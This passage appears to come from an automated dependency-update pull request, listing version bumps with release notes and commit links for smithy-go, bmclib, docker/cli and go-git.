functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.3+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/055a478ea9010a19d0d4674c0d0e87ade37a4223\"\u003e\u003ccode\u003e055a478\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6945\"\u003e#6945\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d0f5b279e9ead4cadc6f78a2ea0ff29f652f1c50\"\u003e\u003ccode\u003ed0f5b27\u003c/code\u003e\u003c/a\u003e cmd/docker-trust: bump moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/b7f37e86da572a12dcea84a2e08183132bf51e00\"\u003e\u003ccode\u003eb7f37e8\u003c/code\u003e\u003c/a\u003e vendor: github.com/moby/moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c93d892f0ea0145d9e6ab99bb4aae7dbcb389d61\"\u003e\u003ccode\u003ec93d892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6949\"\u003e#6949\u003c/a\u003e from thaJeztah/bump_utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/3553cafa13f691eb0a5a726f5457929c44fd55e7\"\u003e\u003ccode\u003e3553caf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6948\"\u003e#6948\u003c/a\u003e from thaJeztah/bump_trust_deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/266f039bb52fd237388f08e874aa719d6a6e9835\"\u003e\u003ccode\u003e266f039\u003c/code\u003e\u003c/a\u003e Dockerfile: update compose to v5.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d74d3c3b163abbb084d50676da34a0055d45b855\"\u003e\u003ccode\u003ed74d3c3\u003c/code\u003e\u003c/a\u003e Dockerfile: update buildx to v0.33.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/134c2a0ed627f03cc0e6d1806f96a0b68331dc50\"\u003e\u003ccode\u003e134c2a0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6826\"\u003e#6826\u003c/a\u003e from thaJeztah/bump_golangci_lint2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/58a7c3155b14d6696bb8cb2d7a77c48a555848c1\"\u003e\u003ccode\u003e58a7c31\u003c/code\u003e\u003c/a\u003e golangci-lint: fix lint failures from v2.10.1 upgrade\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f37a9e663fca9f351cdbe3e18353292125108285\"\u003e\u003ccode\u003ef37a9e6\u003c/code\u003e\u003c/a\u003e Dockerfile: update golangci-lint to v2.10.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bc930f4cbe095a3e1d49273655f73fcef7d41a42\"\u003e\u003ccode\u003ebc930f4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca 